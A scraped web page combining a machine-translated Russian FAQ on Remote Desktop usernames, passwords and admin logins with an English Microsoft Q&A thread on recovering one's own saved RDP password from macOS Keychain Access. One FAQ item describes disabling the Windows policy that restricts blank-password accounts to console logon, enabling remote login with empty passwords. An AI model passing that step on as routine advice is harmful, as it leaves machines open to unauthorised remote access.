Щелкните значок настроек / шестеренки в правом верхнем углу окна Jump Desktop Connect. Затем нажмите Диагностика. Ваше имя пользователя будет отображаться рядом с полем «Имя пользователя». Используйте это как имя пользователя в запросе учетных данных Windows.
Как мне найти имя пользователя и пароль для удаленного рабочего стола?
Удаленный рабочий стол с компьютера Linux
Откройте свою терминальную программу. (Не забудьте использовать IP-адрес вашего сервера.) Появится запрос на вход в Windows. Войдите в систему, используя «Администратор» в качестве имени пользователя и основного пароля администратора..
Что такое учетный пароль в удаленном рабочем столе?
Обычно используется для хранения учетных данных Windows для ваших текущих сеансов потому что диспетчер удаленного рабочего стола не может получить к ним доступ. … Когда требуется сменить пароль, вам просто нужно изменить его один раз в «Мои личные учетные данные».
Как мне войти в удаленный рабочий стол без пароля?
Windows — разрешить доступ к удаленному рабочему столу с пустыми паролями
- Запустите gpedit.msc.
- Перейдите в Конфигурация компьютера> Параметры Windows> Параметры безопасности> Локальные политики> Параметры безопасности.
- Установить учетные записи: ограничение использования пустых паролей локальными учетными записями только для входа в консоль = отключено.
Как подключиться к удаленному рабочему столу в Windows 10?
На локальном ПК с Windows 10: в поле поиска на панели задач тип Подключение к удаленному рабочему столу, а затем выберите Подключение к удаленному рабочему столу. В «Подключение к удаленному рабочему столу» введите имя ПК, к которому вы хотите подключиться (из шага 1), а затем выберите «Подключиться».
Как настроить учетные данные удаленного рабочего стола?
Перейдите в «Пуск -> Все программы -> Стандартные -> Подключение к удаленному рабочему столу».». 2. Откроется окно, подобное приведенному ниже, где вы должны ввести адрес своего удаленного компьютера. Нажмите «Подключиться», чтобы ввести свои учетные данные.
Как использовать учетные данные удаленного рабочего стола?
- Запустите клиент подключения к удаленному рабочему столу Microsoft, щелкнув Пуск> Все программы> Стандартные> Подключение к удаленному рабочему столу.
- Укажите имя целевого хоста или IP-адрес.
- Нажмите Connect.
- Когда будет предложено войти в систему с учетными данными общего доступа, выберите Да.
Как изменить учетные данные удаленного рабочего стола?
Как изменить пароль через удаленный рабочий стол
- Шаг 1: В меню «Пуск» окна найдите «подключение к удаленному рабочему столу» и откройте его.
- Шаг 2: Введите имя компьютера как «passreset1.uwb.edu» и нажмите «Подключиться».
- Шаг 3: Вам будет предложено ввести учетные данные, выберите «Использовать другую учетную запись».
Как мне войти в систему как администратор на удаленном рабочем столе?
Удаленный рабочий стол: добавление пользователя в группу администраторов (Windows 7)
- Откройте меню «Пуск» на рабочем столе и выберите «Панель управления».
- Выберите Учетные записи пользователей и выберите Учетные записи пользователей.
- Выберите Управление учетными записями пользователей.
- В окне «Учетные записи пользователей» выберите учетную запись, которую нужно изменить, и выберите «Свойства».
Как мне войти на удаленный рабочий стол как администратор?
Сетевое администрирование: подключение к удаленному рабочему столу
- Откройте Панель управления и дважды щелкните Система. На этом шаге появляется системный апплет.
- Щелкните вкладку Remote. Этот шаг вызывает параметры удаленного доступа.
- Установите один из двух флажков Разрешить подключения. Какой выбрать? …
- Щелкните ОК. Готово!
Microsoft Remote Desktop password
I made mistake- deleted fresh created password on my RDP, but I saved it in the Microsoft Remote Desktop and can login in my RDP. How can I see password in the soft? If I go to the «Preferences»then «User account» I see only only bold points and can’t see password.
Remote Desktop
A Microsoft app that connects remotely to computers and to virtual apps and desktops.
4,076 questions
Sign in to follow
1 comment Hide comments for this question Report a concern
I have the same question 1
Felix zhao 1 Reputation point
2021-10-21T07:43:39.043+00:00
Hello, I also encountered the same problem, how did you solve it in the end?
0 votes Report a concern
Accepted answer
Eleven Yu (Shanghai Wicresoft Co,.Ltd.) 10,726 Reputation points • Microsoft Vendor
2020-11-12T02:34:06.913+00:00
Hi, Please check if you can find the pathword from below paths: /Users/$USER/Library/Containers/com.microsoft.rdc.mac/Data/Library/Preferences/com.microsoft.rdc.mac.plist
Applications/Utilities/Keychain Access For your reference: https://apple.stackexchange.com/questions/182209/where-does-microsoft-rdp-8-for-mac-store-its-configuration/182258 Hope the information helps. Thanks,
Eleven
If the Answer is helpful, please click «Accept Answer» and upvote it. Thanks.
6 comments Show comments for this answer Report a concern
Olen Matronov 26 Reputation points
2020-11-12T06:54:37.823+00:00
I go to this folder, try to open by Keychain file com.microsoft.rdc.mac.plist but get error. The content of this object could not be retrieved. How can I see password?
0 votes Report a concern
Olen Matronov 26 Reputation points
2020-11-12T07:01:34.147+00:00
Huh find password. Thank you very much, you are my superhero 🙂
0 votes Report a concern
Eleven Yu (Shanghai Wicresoft Co,.Ltd.) 10,726 Reputation points • Microsoft Vendor
2020-11-12T07:05:27.26+00:00
Glad to hear the password is found finally.
0 votes Report a concern
Nathália Gucowski 1 Reputation point
2021-04-09T15:01:03.683+00:00
How did you find it? I keep getting the same error you mentioned The content of this object could not be retrieved.
0 votes Report a concern
Felix zhao 1 Reputation point
2021-10-21T07:42:16.917+00:00
Hello, I also encountered the same problem, how did you solve it in the end?
0 votes Report a concern
Felix zhao 1 Reputation point
2021-10-22T07:37:13.137+00:00
- Use RDP login into Windows.
- Open cmd as Adin, and run net user .
It’s work for me.
0 votes Report a concern
Show 1 more comment
1 additional answer
Sort by: Most helpful
Most helpful Newest Oldest
Deepak Rao 21 Reputation points
2021-12-15T13:51:58.873+00:00
This is what worked for me. I’m on MacOS Mojave (10.14) Let’s say the user account stored in Microsoft Remote Desktop is «sleepycat» and you want to know the password. Open Keychain Access -> Click «Login» from Keychains (other options would be iCloud, System and System Roots). Under Category select «All Items» or «Passwords»
On the right pane, search for «sleepycat». Right click -> Copy Password to Clipboard (It may prompt you for your mac credentials)
Paste the copied password on to a text editor to see the password. Hope this helps.
1 comment Show comments for this answer Report a concern
Mark, Andrew 1 Reputation point
2023-01-03T19:53:53.913+00:00
Or, instead of copying & pasting, you can also right-click the password entry and click «Get Info». On the following dialog, click the «Show password» box and enter your keychain credentials. Then, the password will be revealed. Thank you for this post, it was very helpful.